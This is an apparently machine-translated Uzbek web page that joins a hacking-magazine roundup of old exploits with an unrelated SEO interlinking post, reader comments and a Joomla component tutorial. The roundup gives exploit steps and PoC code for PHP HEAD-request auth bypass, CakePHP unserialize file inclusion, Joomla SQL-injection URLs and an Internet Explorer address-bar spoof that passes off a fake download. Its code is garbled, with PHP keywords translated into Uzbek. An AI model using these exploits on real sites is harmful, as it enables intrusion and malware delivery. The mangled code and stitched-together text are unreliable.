Nopok veb-havolalar php. Hack va qo'shimchalar

Bu oyda xato izlovchilar bizni mashhur ilovalardagi yangi yuqori darajadagi ekspluatatsiyalar bilan erkalashni xohlamaydilar. Albatta, taniqli kompaniyalarning mahsulotlarida chop etilgan ko'plab maslahatlar mavjud, ammo ularning juda oz qismi hazm bo'ladigan PoC kodlarini o'z ichiga oladi. Bizning sharhimizda men so'nggi yillarda tasvirlangan eng muhim va to'liq zaifliklarni to'plashga harakat qildim, shuning uchun orqaga o'tirib, o'qishdan zavqlaning.

HTTP bosh so'rovlarini boshqarishda PHP zaifligi

Qisqacha

3 mart kuni ma'lum bir Adam Ivanyuk PHP tarjimonida HEAD so'rovlarini unchalik to'g'ri bajarmaydigan qiziqarli xususiyatni topdi. Tadqiqotchi ushbu zaiflikni "PHP skriptlarida HTTP HEAD usuli hiylasi" deb nomladi.

Ko'pgina koderlar o'zlarining PHP skriptlarini ularda yozilgan barcha ko'rsatmalar biron bir joyda (ayniqsa, qisqa skriptlarda) to'xtatilmasdan muvaffaqiyatli bajariladi degan umidda ishlab chiqadilar. Agar skript oxirgi foydalanuvchi tomonidan so'ralsa, shunday bo'ladi GET usullari, POST, PUT.

Ammo HEAD kabi boshqa HTTP usullari mavjudligini bilishingiz kerak. Aynan PHP ushbu usul bilan ishlaganda xavfsizlik teshigi paydo bo'lishi mumkin.

Keling, tarjimon manbalaridan birini ko'rib chiqaylik: ./main/SAPI.c, 315-qator:

agar (SG (request_info) .request_method &&
! strcmp (SG (request_info) .request_method, "HEAD"))
{
SG (request_info) .headers_only = 1;
...

Har qanday ma'lumot kelganda, php_ub_body_write funksiyasi bajariladi. Keyin biz main / output.c, 699-qatorga qaraymiz:

agar (SG (request_info) .faqat sarlavhalar) (
agar (SG (sarlavhalar_yuborilgan))
{
qaytish 0;
}
php_header (TSRMLS_C);
zend_bailout ();
}

Bu erda siz birinchi marta ko'rsatilganda va HEAD usuli ishlatilganda, zend_bailout funksiyasi skriptni bekor qilishini ko'rishingiz mumkin.

Ekspluatatsiya qilish

$ line = "Nik:" .htmlspecialchars
($ _POST ["nik"])."

Matn: ".htmlspecialchars
($ _POST ["matn"])."

---

";
$ f = fopen ("book.txt", "r");
$ data = fread ($ f, fayl hajmi ("book.txt"));
fyopish ($ f);
$ f = fopen ("book.txt", "w");
$ data = $ line $ data;
echo $ ma'lumotlari;
fwrite ($ f, $ ma'lumotlar);
fyopish ($ f);
?>

Endi HEAD usuli yordamida ushbu skriptga murojaat qilaylik:

stream_context_get_default
(massiv ("http" => massiv ("metod" => "HEAD"))));
print_r (get_headers ("http://site.com/guestbook.php"));
?>

Siz kutganingizdek, bizning mehmonlar kitobimiz "echo $ data;" qatorida ishlashni to'xtatadi, shuning uchun book.txt fayli shunchaki nolga qaytariladi.
Bu misol juda halokatli. Ikkinchi misolda biz ibtidoiy boshqaruv panelidagi avtorizatsiyani chetlab o'tishimiz mumkin:

sessiya_start ();
echo "Uzoq satr taxminan 4090 ta belgidan iborat";
$ _SESSION ["admin"] = 1;
agar (! isset ($ _ POST ["o'tish"]) ||
$ _POST ["o'tish"]! = "Parol")
{
aks-sado " Noto'g'ri yoki bo'sh parol.
";
$ _SESSION ["admin_level"] = 0;
}
?>

Ushbu skriptda odatiy usullardan foydalangan holda tizimga kirishda seansda ma'muriy o'zgaruvchi o'rnatiladi. Keyin, agar foydalanuvchi noto'g'ri parolni kiritgan bo'lsa, bu o'zgaruvchi o'chiriladi va foydalanuvchi administrator bo'lmaydi.

Agar biz HEAD orqali administrator paneliga kirsak, uning bajarilishi "echo" bilan kod bo'lagida to'xtatiladi, shuning uchun ma'muriy o'zgaruvchi qayta o'rnatilmaydi va biz dasturning yopiq qismida xavfsiz kezishimiz mumkin. E'tibor bering, ko'pgina veb-serverlar chiqish buferini 4096 baytga o'rnatadi, shuning uchun ishchi misolda bizga "Uzun qatorda taxminan 4090 belgi mavjud" qatori kerak bo'lishi mumkin.

Ekspluatatsiya qilish

• PHP<= 5.3.5

Yechim

Ushbu ko'rib chiqish vaqtida PHP ning eng so'nggi versiyasi 5.3.5 versiyasidir. Unda ushbu xato bilan bog'liq hech qanday tuzatish mavjud emas, shuning uchun men faqat HEAD usulidan foydalanganda kutilmagan vaziyatlar uchun skriptlaringiz manbalarini diqqat bilan ko'rib chiqishingizni maslahat beraman.

CakePHP da o'zboshimchalik bilan kod bajarilishi

Qisqacha

CakePHP - bu PHP-da yozilgan va ochiq kodli dasturiy ta'minot tamoyillari asosida qurilgan veb-ilovalarni yaratish uchun eng mashhur (Google tomonidan 7 000 000 dan ortiq) dasturiy ta'minot tizimi. CakePHP Model-View-Controller (MVC) naqshini amalga oshiradi.

Dastlab, ushbu ramka mashhur Ruby on Rails-ning kloni sifatida yaratilgan, ko'plab g'oyalar u erdan olingan:

• O'zining fayl tuzilishi;
• ko'plab plaginlarni qo'llab-quvvatlash;
• ma'lumotlarning abstraktsiyasi (PEAR :: DB, ADOdb va Cakening o'z rivojlanishi);
• ko'p ma'lumotlar bazasini qo'llab-quvvatlash (PostgreSQL, MySQL, SQLite, Oracle).

Bunday ajoyib dasturiy mahsulot ko'plab pentestersning e'tiborini qozonganligi ajablanarli emas. Yaqinda Feliks taxallusi ostidagi odam sehrli usullar va seriyani yo'q qilish funktsiyasidan foydalanish bilan bog'liq qiziqarli xatoni topdi (jurnalning o'tgan yilgi sonlarida ushbu zaifliklar sinfi haqida ko'proq o'qing).

Birinchidan, komponentni oching. / Libs / controller / components / security.php va POST so'rovlari yordamida XSRF hujumlaridan himoya qilish uchun javob beradigan quyidagi kodni qidiring:

_validatePost funktsiyasi (& $ kontroller)
{
...
$ tekshirish = $ kontroller-> ma'lumotlar;
$ token = urldecode ($ check ["_ Token"] ["fields"]);
agar (strpos ($ token, ":")) (
ro'yxat ($ token, $ qulflangan) = portlash (":", $ token, 2);
}
$ qulflangan = seriyadan chiqarish (str_rot13 ($ qulflangan));
...
?>

Bu erda $ tekshirish massivi POST ma'lumotlarimizni o'z ichiga oladi va $ qulflangan o'zgaruvchi str_rot13 () funksiyasi yordamida to'liq nazorat ostida bo'lgan ketma-ketlashtirilgan qatordir.

Shu o'rinda, [] da tegishli maqolalarni o'qimaganlar uchun kichik bir chetga chiqish va sehrda o'zini namoyon qiladigan xato haqida qisqacha gapirishga arziydi. PHP usullari... Shunday qilib, PHP 5-versiyasi OOP dasturlashning asosiy tushunchasini kiritdi: konstruktor va destruktor. Konstruktor __construct usuli yordamida, destruktor esa __destruct usuli yordamida amalga oshiriladi. Ishning oxirida va unserialize () funksiyasi orqali chaqirilganda, har bir ob'ekt kodda yozilgan bo'lsa, o'zining __ yo'q qilish usulini bajaradi.

Keling, ramkamizga qaytaylik va fayldan App sinfining destruktorini ko'rib chiqaylik. / Libs / configure.php:

__destruct funktsiyasi ()
{
agar ($ bu -> __ kesh)
{
$ yadro = Ilova :: yadro ("tort");
o'rnatilmagan ($ bu -> __ yo'llar);
Kesh :: yozish ("dir_map", array_fi lter ($ bu -> __ yo'llar),
"tort_yadrosi");
Kesh :: yozish ("fi le_map", array_fi lter ($ this -> __ map),
"tort_yadrosi");
Kesh :: yozish ("ob'ekt_xaritasi", $ this -> __ ob'ektlar,
"tort_yadrosi");
}
}

Yuqoridagi koddan buni tushunishingiz mumkin bu usul Kesh ob'ektiga o'zboshimchalik bilan qiymatlarni yozish orqali buzilishi mumkin. Yozish uchun eng qiziqarli kalit bu "file_map". U sinflar va mos keladigan PHP fayllari o'rtasidagi ulanishlarni boshqaradi, shuningdek, skriptni bajarish paytida qo'shimcha sinflarni yuklash uchun ishlatiladi.

Sinflarni yuklash uchun haqiqiy kod biroz murakkabroq ko'rinadi, ammo barchasi App sinfidagi __load usulidan quyidagi kodga tushadi:

...
agar (fayl_mavjud bo'lsa ($file)) (
agar (! $ bu-> qaytish) (
talab qilish ($ fayl);
$ bu -> __ yuklangan [$ fayl] = rost;
}
haqiqatni qaytarish;
...
?>

Bingo! $ fayl o'zgaruvchisini o'zgartirish orqali biz o'z PHP kodimizni kiritishimiz mumkin! Bundan tashqari, bu haqiqiy masofaviy fayllarni kiritish xatosi bo'ladi - shuning uchun bizga mahalliy fayllarni serverga yuklashda qo'shimcha hiyla-nayranglar kerak bo'lmaydi. Biroq, topilgan zaiflik muallifi ushbu teshikdan LFI ekspluatatsiyasini taklif qiladi, chunki CakePHP tajovuzkorga ma'lum bo'lgan katalogda ketma-ketlashtirilgan faylga asoslangan mahalliy keshdan foydalanadi.

Ekspluatatsiya qilish

Zaharli seriyali satrni yaratish uchun kichik PoC sifatida Feliks quyidagi kodni taklif qiladi:

$ x = yangi ilova ();
$ x -> __ kesh = 1;
$ x -> __ xarita = massiv (“Yadro” => massiv (
"Router" => "../tmp/cache/persistent/cake_core_fi le_map"),
"Foo" => "");
$ x -> __ yo'llar = massiv ();
$ x -> __ ob'ektlar = massiv ();
echo serialize ($ x);
?>

Albatta, avval CakePHP dan kerakli sinflarni kiritishingiz kerak. Bundan tashqari, malloc.im/burnedcake.py saytida topishingiz mumkin bo'lgan to'liq funktsional Python ekspluati mavjud.

Ushbu nuqta xavfsizlik tokenlari bilan POST shakllaridan foydalanadigan va standart kesh joylashuvini o'zgartirmaydigan har bir CakePHP ilovasida ishlashi kerak. Odatiy bo'lib, ekspluatatsiya ma'lumotlar bazasi konfiguratsiyasini ko'rsatadi, boshqa foydali narsalar o'rnatilgan PHP yukini o'zgartirish orqali osongina qo'shiladi.

Maqsadlar

• CakePHP<= 1.3.5, CakePHP <= 1.2.8

Yechim

Ta'riflangan zaiflikni tuzatish uchun siz ishlab chiqaruvchining cakephp.org veb-saytidan foydalanayotgan CakePHP filialining so'nggi versiyasini yuklab olishingiz kifoya.

Joomla'da yo'l ta'siri va potentsial SQL in'ektsiyalari!

Qisqacha

Joomla PHP va JavaScript-da yozilgan kontentni boshqarish tizimi bo'lib, saqlash sifatida MySQL ma'lumotlar bazasidan foydalanadi. Bu GNU GPL litsenziyasiga ega bepul dasturiy ta'minot.

Agar siz Joomla-ga duch kelmagan bo'lsangiz! Ushbu sharhda men bir vaqtning o'zida e'tiborga olinmagan va burilmagan Joomla-ning turli tarmoqlarida ikkita potentsial SQL in'ektsiyasi haqida gaplashmoqchiman.

Shunday qilib, birinchi in'ektsiya YGN Ethical Hacker Group (yehg.net/lab) yigitlari tomonidan 1.5.21 dvigatelida topilgan.

Tadqiqotchilarning o'zlariga ko'ra, potentsial SQL in'ektsiyalari ular tomonidan Joomla-da aniqlangan! 1.5.20 XSS bo'yicha tadqiqotning bir qismi sifatida. Bu xatolar zudlik bilan dvigatelni ishlab chiqish guruhiga xabar qilindi, ular tez orada 1.5.21 “yamalgan” versiyasini chiqardi. “Yamalgan” so‘zi tirnoq ichida, chunki ishlab chiquvchilar YEHG maslahat guruhining ko‘pchiligiga ko‘z yumishgan va bu zaifliklardan Joomla! o'rnatilgan xavfsizlik qator filtrlariga ega.

Natijada, xato izlovchilar aniqlangan potentsial SQL in'ektsiyalaridan foydalanish tafsilotlarini keng jamoatchilikka ochib berishdi, biz bundan albatta foydalanamiz.
Shunday qilib, faylni oching. / Components / com_weblinks / models / category.php va undan quyidagi kodni toping:

_buildQuery funktsiyasi ()
{
$ fi lter_order = $ this-> getState ("fi lter_order");
$ fi lter_order_dir = $ this-> getState ("fi lter_order_dir");
$ fi lter_order = JFilterInput :: toza ($ fi lter_order, "cmd");
$ fi lter_order_dir =
JFilterInput :: toza ($ fi lter_order_dir, "so'z");
// Biz hammamiz ro'yxatini olishimiz kerak
// berilgan toifadagi veb-havolalar
$ so'rovi = "SELECT *".
"#__veb-havolalardan".
"WHERE catid=". (int) $ bu -> _ id.
"VA nashr etilgan = 1".
"VA arxivlangan = 0".
"Buyurtma berish". $ fi lter_order. "".
$ fi lter_order_dir. ", buyurtma berish";
$ so'rovini qaytarish;
}

Bu erda siz $ filter_order va $ filter_order_dir o'zgaruvchilari SQL bayonotlariga qat'iy muvofiqligi tekshirilmaganligini ko'rishingiz mumkin, tekshirish faqat foydalanish orqali amalga oshiriladi. standart usul JFilterInput sinfidan tozalang:

...
"WORD" holati:
$ natija = (string) preg_replace ("/ [^ A-Z _] / i", "", $ manba);
sindirish;
...
"CMD" holati:
$ natija = (string)
preg_replace ("/ [^ A-Z0-9 _.-] / i", "", $ manba);
$ natija = ltrim ($ natija, ".");
sindirish;
...

Shunday qilib, sukut bo'yicha biz yo'llarning oshkor etilishini olamiz. Xuddi shu o'zgaruvchilardagi shunga o'xshash xato yaqinda yangi 1.6 filialidan dvigatelning birinchi versiyasida topilgan.

Ekspluatatsiya qilish

Odatiy bo'lib, biz faqat Joomla'da yo'lni kengaytirishdan foydalanishimiz mumkin!<= 1.5.21:

• /index.php?option=com_weblinks&view=category&id=2&fi lter_order_Dir = & fillter_order =% 00 ′
• /index.php?option=com_weblinks&view=category&id=2&fi lter_order_Dir = ’& fi lter_order = asc

va Joomla'da! 1.6.0:

• attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?fi lter_order = yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAA limit_Aor = 2 & fi & lter_order =
• attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?fi lter_order = 1, & fi lter_order_Dir = yehg.net.BBBBBBBBBBBB, & limit = 3 & limitstart = 4

Biroq, xato qidiruvchilar dvigatelning ishlashi kontekstida allaqachon o'g'irlangan Joomla o'rnatmalarida ushbu xatolardan foydalanishni taklif qilishadi: siz shunchaki JFilterInput :: filtrlarini filter_order_Dir va filter_order o'zgaruvchilaridan olib tashlashingiz kerak, shundan so'ng siz o'zgartirilgan zaiflikdan cheksiz muddatga foydalanishingiz mumkin. .

Bundan tashqari, ba'zi bir zukko odamlar hali ham ushbu mashhur filtrlarni chetlab o'tishga muvaffaq bo'lganligi haqida ma'lumotlar mavjud, ammo ekspluatatsiya chuqur maxfiylikda.

Maqsadlar

• Joomla!<= 1.5.21, Joomla! 1.6.0

Yechim

Har doimgidek, joomla.org ishlab chiqaruvchisining rasmiy saytidan yangilashni unutmang. Ushbu yozish vaqtida ushbu CMSning so'nggi versiyalari mos ravishda 1.5.22 va 1.6.0 edi.

Microsoft Internet Explorer-da manzillar panelini soxtalashtirish

Qisqacha

Nihoyat, men sizga IE eshakidagi kichik va juda kulgili xato haqida gapirib bermoqchiman, uni kiber flash taxallusi ostidagi xaker aniqlagan. Bu xato masofaviy foydalanuvchiga asosiy spoofing hujumini amalga oshirish imkonini beradi.

Zaiflik qalqib chiquvchi oynaning manzillar panelini yangilash paytidagi xato tufayli yuzaga keladi. Masofaviy foydalanuvchi brauzerni manzil satrida manzilning faqat ma'lum bir qismini ko'rsatishga majburlash uchun maxsus yaratilgan veb-sahifadan foydalanishi mumkin.

Ekspluatatsiya qilish

Manzil satrini almashtirishga misol sifatida muallifning o'zi quyidagi PoC HTML kodini taklif qiladi:

kontent = "matn / html; charset = windows-1252">





Ushbu sahifaning istalgan joyini bosing!

Cyber ​​​​flash shuningdek, keyloggeronline.com/misc/temp/about.htm manzilida testlar uchun PoC kodli tayyor sahifani taqdim etadi.

Ushbu sahifaga kirganimizdan so'ng, bizni bing.com veb-saytiga o'tishga taklif qiladigan havolali yozuvni ko'ramiz. Havolani bosish orqali biz qalqib chiquvchi oynani ko'ramiz, uning manzil satrida xuddi shu Bing paydo bo'ladi. Quyida yangi Internet Explorer-ni yuklab olishga chaqiruvchi yana bir havola bo'ladi (bundan tashqari, "Yuklab olish" ustiga olib, biz hech qanday shubhali narsani ko'rmaymiz, garchi brauzerning yangi versiyasi emas, balki Cyber ​​​​-dan psevdo-troyan dasturi mavjud. Flash).
Shunday qilib, tajovuzkor zararli faylni Eshak foydalanuvchisiga osongina o'tkazib yuborishi mumkin.

Maqsadlar

• MS Internet Explorer 7, 8, 9

Yechim

Ayni paytda, kichiklar tasvirlangan zaiflikni hali tuzatmagan, shuning uchun agar siz IE dan foydalansangiz, vaqtinchalik chora sifatida notanish qalqib chiquvchi oynalar bilan ehtiyot bo'lishingizni maslahat beraman.

Men siz bilan sayt uchun kichik, lekin juda foydali skriptlarni baham ko'rishda davom etaman, bu esa qidiruv tizimlarining saytingiz bilan aloqasini yaxshilashga yordam beradi. Bu safar biz sahifalarni malakali bog'lashga e'tibor qaratamiz.

Birinchidan, sahifa manzillari va ularning har biriga mumkin bo'lgan langarlarning ma'lumotlar bazasini yarataylik. Biz asos sifatida * .txt faylidan foydalanamiz. Fayl tuzilishi quyidagicha bo'ladi:

1-sahifa_manzili; langar_1, langar_2, langar_3, ..., langar_sahifa_manzili_2; langar_1, langar_2, langar_3, ..., langar_sahifa_manzili_3; langar_1, langar_2, langar_3, ..., langar_3, langar_1 sahifa. .., anchor_n

Ko'rib turganingizdek, skriptdan keyingi foydalanish istalgan sahifa manzillari va ularga langarlar bilan mumkin. Sahifa manzili http://www.site.ru/siz yoziladi, ya'ni. to'g'ridan-to'g'ri ildizdan birinchi chiziqsiz. Manzil langarlardan nuqta-vergul bilan ajratilgan va ularning orasidagi langarlar shunchaki verguldir. Siz to'liq manzilni ham yozishingiz mumkin, bu shaxsan men uchun qulayroq va siz to'ldirish va natijani o'zingiz o'zgartirishingiz mumkin, men buni intuitiv ravishda tushunasiz deb o'ylayman.

Shunday qilib, ularga havolalar va langarlar bazasi yaratildi, keyin men saytga ulanish uchun havolalarni to'g'ridan-to'g'ri ko'rsatish uchun PHP kodiga misol keltiraman:

". $ tex2 [$ tex3].""; } ?>

Biz ushbu kodni saytning istalgan joyiga joylashtiramiz, unda bazadan 5 ta tasodifiy havola va tasodifiy langar ko'rsatiladi. Havolaga faqat 1 ni yozmasdan, langarlarni suyultirish yaxshidir. Saytda to'g'ri bog'lanish bilan siz darhol trafikning ko'payishini va saytning boshqa ko'rsatkichlarining yaxshilanishini ko'rasiz.

Savollaringizni ushbu postga sharhlarda kutaman.

Nashr qilingan sana: 2014 yil 03 mart

Fikr va mulohazalar:

Dmitriy:
Skript uchun rahmat, men uni amalga oshiraman. Kimdan manba kodi saytdan ko'chirib bo'lmaydi, u faqat kichik parchalarda ko'chiriladi, umuman olganda qulayroq bo'ladi.

Kirill:
Nusxalash bilan izohlaganingiz uchun tashakkur, men buni hozir ko'rdim, yaqin kelajakda tuzatishga harakat qilaman.

Aleksey Pavlov:
$ tex = portlash satridagi xato (":", $ sendlist [$ count] nuqtali vergul kerak, ikki nuqta emas. Aniqroq bo'lishi uchun kodni biroz o'zgartirdim:$ langar"; } ?>

Matrk:
Maqola mutlaqo foydasiz, chunki blog matnni nusxalashdan himoyalangan.

Kirill:
JS da kichik jamb bor, ha, uni tuzatishga vaqt yo'q, lekin boshqa birovning foydasi yo'q, chunki aql etarli emas, bu holda sahifaning manba kodiga qarang va u erdan oling.

Matrk:
Bular. Men hali ham manba kodini ko'tarib, uni har qanday axlatdan tozalashim kerakmi? Siz kulgilisiz.

Kirill:
Ma'lum bo'lishicha, men kimdandir qarzdorman? Pulni sizdan oldim, bu yerda harakat qilyapsiz, tekin maslahat berasiz:))) Bepul pishloq faqat sichqonchaning qopqonida, yoshingiz bilan tushunasiz.

Kirill:
Men bo'g'inni olib tashladim, sog'ligingiz uchun foydalaning.

Andrey Kopaev:
1 - MySQL ma'lumotlar bazasi yordamida buni qilish yaxshiroq bo'lsa kerak, u tezroq ishlaydi, qo'shish osonroq 2 - Men har safar havolalar ro'yxatini yaratishning ma'nosini tushunmayapmanmi? bu trafik o'sishiga qanday ta'sir qiladi? ajax bilan yuklash mumkinmi, ya'ni. odamlar uchunmi yoki botlar uchunmi?

www.sayt:
Ko'tarilish uchun, shaxsan men PS bilan bunday manipulyatsiya tarafdori emasman.

Joomla-ga kirish nuqtasi! komponent ko'pchilik komponentlar uchun o'xshash. Ushbu misol uchun biz Joomla asosiy komponentlaridan biri - Web Links dan foydalanamiz. Front-endda bajariladigan birinchi fayl: … / Komponentlar / com_weblinks / weblinks.php.

Birinchidan, biz hech kim ushbu sahifani to'g'ridan-to'g'ri ishlata olmasligiga ishonch hosil qilish uchun mo'ljallangan xavfsizlik tekshiruvini ko'ramiz. Bu barcha PHP fayllaringizda qo'llanilishi kerak bo'lgan standartdir (bir nechta istisnolar mavjud bo'lsa ham):

Muayyan kontroller nomi yuborilganligini bilish uchun so'rovlar qatorini tekshiramiz. Agar shunday bo'lsa, biz nazoratchi katalogiga kerakli faylni yuklashimiz mumkinligiga ishonch hosil qilamiz:

// Agar so'ralsa, maxsus kontrollerni talab qiling agar ($ controller = JRequest :: getWord ("controller")) ($ path = JPATH_COMPONENT. DS. "controller". DS. $ controller. ".php"; if (file_exists ($ path)) (require_once $ path; ) else ($ kontroller = "";))

Endi biz yuqorida belgilagan nomdan foydalanib, nazoratchi sinfimizning namunasini yaratamiz:

Vazifa tugashi bilan, agar kerak bo'lsa, biz qayta yo'naltirishni amalga oshiramiz:

// Agar tekshirgich tomonidan o'rnatilgan bo'lsa, qayta yo'naltirish$ kontroller -> qayta yo'naltirish ();

Nazoratchi sinfi

Havolalar komponenti uchun umumiy kontroller bu yerda joylashgan: … / Komponentlar / com_weblinks / controller.php.
Bu butun sinf ko'rsatish usulini belgilaydi, agar foydalanuvchi boshqa vazifani belgilamasa, bu standart hisoblanadi.

belgilangan ("_JEXEC") yoki o'ladi ("Cheklangan kirish"); jimport ( "joomla.application.component.controller") ; / ** * Veb-havolalar komponent boshqaruvchisi * * @package Joomla * @subpackage veb-havolalari * @1,5 dan beri * / class WeblinksController JController-ni kengaytiradi ( / ** * Veb-havolalar ko'rinishini ko'rsatish usuli * * @access public * @1,5 dan beri * / funktsiyani ko'rsatish () ( // Agar mavjud bo'lmasa, standart ko'rinishni o'rnating agar (! JRequest :: getCmd ("ko'rish")) (JRequest :: setVar ("ko'rish", "toifalar");) // veb-havola uchun xitlar sonini yangilang agar (JRequest :: getCmd ("ko'rish") == "veb-havola") ($ model = & $ bu -> getModel ("veb-havola"); $ model -> urish ();) // Keshlash mantiqini ko'rish - oddiy ... biz tizimga kirdikmi?$ user = & JFactory :: getUser (); $ view = JRequest :: getVar ("ko'rish"); $ viewcache = JRequest :: getVar ("viewcache", "1", "POST", "INT"); if ($ user -> get ("id") || ($ view == "category" && $ viewcache == 0)) (ota-ona :: ko'rsatish (noto'g'ri);) else (ota-ona :: ko'rsatish (to'g'ri); )))

Ushbu usulda biz standart ko'rinishni (ko'rinishni) o'rnatamiz: agar so'rovlar qatori parametri sifatida boshqa ko'rinish o'tkazilmagan bo'lsa, toifalarni ko'rsatish. Agar kerakli ko'rinish veb-havola bo'lsa, biz havolani ko'rish sonini oshiramiz. Keyin ko'rish o'zgaruvchisining qiymatini o'rnatamiz va chaqiramiz bizning ota-ona JController sinfimizning ko'rsatish usuli.
GetModel usuliga qo'ng'iroq qilishga alohida e'tibor qaratish lozim. U kerakli narsani yuklab oladi komponent uchun model... Ushbu misolda bu usul bu yerda topilgan veb-havola modelini yuklaydi: … / Komponentlar / com_weblinks / modellar / weblink.php.
Bu erda biz aniq ko'rinishni talab qilmaganimizga rozi bo'lamiz va shuning uchun bizning nuqtai nazarimiz toifalarga o'rnatiladi.
Keyinchalik, biz ko'rish sinfini ochamiz.

Sinfni ko'rish

Biz kategoriya ko'rinishini xohlaymiz deb taxmin qilganimiz sababli, bu quyidagi faylni bajarish kerak: … / Komponentlar / com_weblinks / ko'rinishlar / kategoriyalar / view.html.php

// Ushbu fayl Joomla!ga kiritilganligiga ishonch hosil qiling! belgilangan ("_JEXEC") yoki o'ladi ("Cheklangan kirish"); jimport ( "joomla.application.component.view") ; / ** * WebLinks komponenti uchun HTML koʻrish klassi * * @static * @package Joomla * @subpackage Weblinks * @1.0 dan beri * / class WeblinksViewCategories JViewni kengaytiradi (funktsiyani ko'rsatish ($ tpl = null) (global $ mainframe; $ hujjat = & JFactory :: getDocument (); $ toifalari = & $ this -> get ("ma'lumotlar"); $ jami = & $ bu -> olish ("jami"); $ holati = & $ bu -> olish ("holat"); // Sahifani / komponent konfiguratsiyasini oling$ params = & $ mainframe -> getParams (); $ menyulari = & JSite :: getMenu (); $ menyu = $ menyular -> getActive (); // chunki ilova standart sahifa sarlavhasini o'rnatadi, biz uni olishimiz kerak // to'g'ridan-to'g'ri menyu elementining o'zidan if (is_object ($ menyusi)) ($ menu_params = yangi JParameter ($ menu -> params); if (! $ menu_params -> get ("page_title")) ($ params -> set ("page_title", JText :: _ ("Veb havolalar");)) else ($ params -> set ("sahifa_sarlavhasi", JText :: _ ("Veb havolalar"));) $ hujjat -> setTitle ($ params -> olish ("sahifa_sarlavhasi" "))) // Paramlar uchun o'rnatilmagan bo'lsa, ba'zi bir standart sozlamalarni o'rnating$ params -> def ("comp_description", JText :: _ ("WEBLINKS_DESC")); // Rasm tegi atributlarini aniqlang agar ($ params -> get ("rasm")! = - 1) (agar ($ params -> get ("image_align")! = "") $ attribs ["align"] = $ params -> get (" image_align "); else $ attribs [" align "] =" "; $ attribs [" hspace "] = 6; // Rasm tegini yaratish uchun statik HTML kutubxonasidan foydalaning$ image = JHTML :: _ ("tasvir", "tasvirlar / hikoyalar /". $ params -> get ("tasvir"), JText :: _ ("Veb havolalar"), $ attribs); ) uchun ($ i = 0; $ i< count ($categories ) ; $i ++ ) { $category =& $categories [ $i ] ; $category ->havola = JRoute :: _ ( "index.php? variant = com_weblinks & view = kategoriya & id ="... $ kategoriya -> slug); // Kategoriya tavsifini tayyorlang$ kategoriya -> tavsif = JHTML :: _ (“content.prepare”, $ kategoriya -> tavsif); ) $ this -> assignRef (“tasvir”, $ tasvir); $ this -> assignRef ("params", $ params); $ this -> assignRef ("toifalar", $ toifalar); ota :: displey ($ tpl); ))?>

Shunga qaramay, bu bitta ko'rsatish usuli bilan juda oddiy sinf. Bu erdagi mantiqning aksariyati havolalar uchun komponentlarga xosdir, lekin agar diqqat bilan qarasangiz, komponent ko'rinishi sinflarining ko'pchiligi tomonidan qo'llaniladigan funksionallikni topishingiz mumkin. Ko'rsatish usuli oxirida bu sinf ota-onani chaqiradi (JView) ko'rsatish usuli, ko'rsatiladigan shablon nomidan o'tish. Agar ko'rsatish shablonining nomi o'tkazilmasa, "standart" shablon ishlatiladi.
Nihoyat, biz shablon sinfini ochamiz.

Shablon sinfi

Muayyan shablon nomi o'tkazilmaganiga rozi bo'laylik, shuning uchun standart shablon ishlatiladi. Bunday holda, quyidagi fayl tekshiriladi: … / Komponentlar / com_weblinks / ko'rinishlar / toifalar / tmpl / default.php
-> qochish ($ this -> params -> get ("sahifa_title")); ?>